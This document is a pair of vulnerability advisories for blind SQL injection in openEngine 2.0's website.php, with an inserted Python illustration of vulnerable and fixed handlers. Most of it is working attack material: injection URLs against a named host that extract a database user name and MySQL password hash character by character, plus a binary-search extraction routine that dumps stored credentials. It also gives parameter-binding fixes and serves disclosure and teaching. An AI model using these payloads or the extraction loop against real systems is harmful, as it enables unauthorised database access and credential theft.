Title: openEngine 2.0 'key' Blind SQL Injection vulnerability
By Stefan Schurtz
Affected program: Successfully tested on openEngine 2.0 100226
Developer: http://www.openengine.de/
Overview:
======================================
The 'key' parameter of website.php in openEngine 2.0 is vulnerable to blind (boolean-based) SQL injection: the value is concatenated into a query, and the response text differs depending on whether the injected condition is true or false.
============================
Technical Analysis
============================
# Database Information
User: easy
# Blind note:
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie möchten die Seite versenden." ("You want to send the page.")
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie möchten die Seite Homepage (de) versenden." ("You want to send the page Homepage (de).")
# User-Guessing
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1))=101 (101 = 'e')
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1))=97 (97 = 'a')
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1))=115 (115 = 's')
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1))=121 (121 = 'y')
==========
Solution:
==========
Validate 'key' as an integer and pass it to the database as a bound parameter (prepared statement) instead of concatenating it into the SQL string. Blacklist-style filtering of the value is not a sufficient fix on its own.
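The following is an added, runnable illustration of the two halves of this advisory (it is not code from the advisory or from openEngine): a stand-in for the vulnerable sendpage handler that concatenates 'key' into its query, a hardened version that binds the value as a parameter, and the boolean-based extraction loop that turns the "Homepage (de)" / no-title page variants into an oracle. The advisory targets MySQL (MID/ORD/CHAR, information_schema); the example uses sqlite3 so it runs offline, with SUBSTR/UNICODE as the equivalent functions. The table and column names, the page texts and the stored credential row are constructed for the example and are not openEngine's real schema.

```python
import sqlite3

# Constructed stand-in for the affected database (assumed schema, not
# openEngine's). The credential row mirrors the values quoted in the advisory.
SCHEMA = """
CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users (name TEXT, password TEXT);
INSERT INTO pages VALUES (1, 'Homepage (de)');
INSERT INTO users VALUES ('easy', '*E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0');
"""


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def sendpage_vulnerable(db, key):
    """Mimics the vulnerable handler: 'key' is concatenated straight into the
    query, so 'key=-1 OR <condition>' turns the page text into a boolean oracle."""
    row = db.execute("SELECT title FROM pages WHERE id = " + key).fetchone()
    if row:
        return "Sie möchten die Seite %s versenden." % row[0]   # condition true
    return "Sie möchten die Seite versenden."                    # condition false


def sendpage_fixed(db, key):
    """Hardened handler: 'key' must be an integer and is bound as a query
    parameter, so injected SQL never reaches the parser."""
    try:
        key_int = int(key)
    except ValueError:
        return "Sie möchten die Seite versenden."
    row = db.execute("SELECT title FROM pages WHERE id = ?", (key_int,)).fetchone()
    if row:
        return "Sie möchten die Seite %s versenden." % row[0]
    return "Sie möchten die Seite versenden."


def make_oracle(handler, db):
    """Returns a function condition -> bool that reads the true/false page
    variant exactly as the advisory's 'OR 1=1' / 'OR 1=2' probes do."""
    def probe(condition):
        return "Homepage (de)" in handler(db, "-1 OR " + condition)
    return probe


def extract_string(probe, subquery, max_len=64):
    """Boolean-based blind extraction of a scalar subquery result.

    Each character is recovered by a binary search over its code point
    (7 requests per ASCII character) instead of the one-request-per-candidate
    guessing shown in the advisory. SUBSTR past the end of the string yields
    '', whose UNICODE() is NULL, so every comparison is false and the search
    converges on 0, which terminates the loop."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if probe("UNICODE(SUBSTR((%s),%d,1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def dump_credentials(handler):
    """Recovers the user name and its password hash through the given handler;
    returns ('', '') when the handler is not injectable."""
    db = build_db()
    probe = make_oracle(handler, db)
    user = extract_string(probe, "SELECT name FROM users LIMIT 1")
    if not user:
        return "", ""
    pw_hash = extract_string(
        probe, "SELECT password FROM users WHERE name = '%s' LIMIT 1" % user)
    return user, pw_hash


if __name__ == "__main__":
    print(dump_credentials(sendpage_vulnerable))  # ('easy', '*E8F5FAE7...')
    print(dump_credentials(sendpage_fixed))       # ('', '')
```

The same loop serves the 'id' injection in the second advisory with two changes to the probe: the condition is wrapped as `') AND <condition> AND ('A'='a` because the value lands inside a quoted string, and the oracle inverts, since there a true condition is the case that produces the error.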
Title: openEngine 2.0 'id' Blind SQL Injection
Overview:
======================================
The 'id' parameter of website.php in openEngine 2.0 is vulnerable to blind SQL injection. The value is embedded inside a quoted string in the query; a payload that closes the quote, injects a condition and reopens the quote (`') AND ... AND ('A'='a`) is evaluated, and the server response (error or no error) reveals whether the condition was true.
============================
Technical analysis:
============================
Database information
User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)
Blind SQL Injection
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1 AND ('A'='a&key= <- error
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0 AND ('A'='a&key= <- no error
User-Guessing
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1))=101 AND ('A'='a <- error (e)
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1))=97 AND ('A'='a <- error (a)
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1))=115 AND ('A'='a <- error (s)
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1))=121 AND ('A'='a <- error (y)
Password (Hash)-Guessing
(CHAR(101,97,115,121) spells the user name 'easy'; the MID offsets 1, 2, 3 walk through the stored hash one character at a time, and the first row of mysql.user for that user is selected with LIMIT 0,1.)
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1))=42 AND ('A'='a <- error (*)
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),2,1))=69 AND ('A'='a <- error (E)
http://www.bkjia.com/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),3,1))=56 AND ('A'='a <- error (8)
... and so on for the remaining characters of the 41-character hash.
==========
Solution:
==========
Treat 'id' as data: bind it as a query parameter (prepared statement) instead of concatenating it into the SQL string, and restrict it to the set of known page paths. Escaping or filtering quote characters alone is not a reliable fix.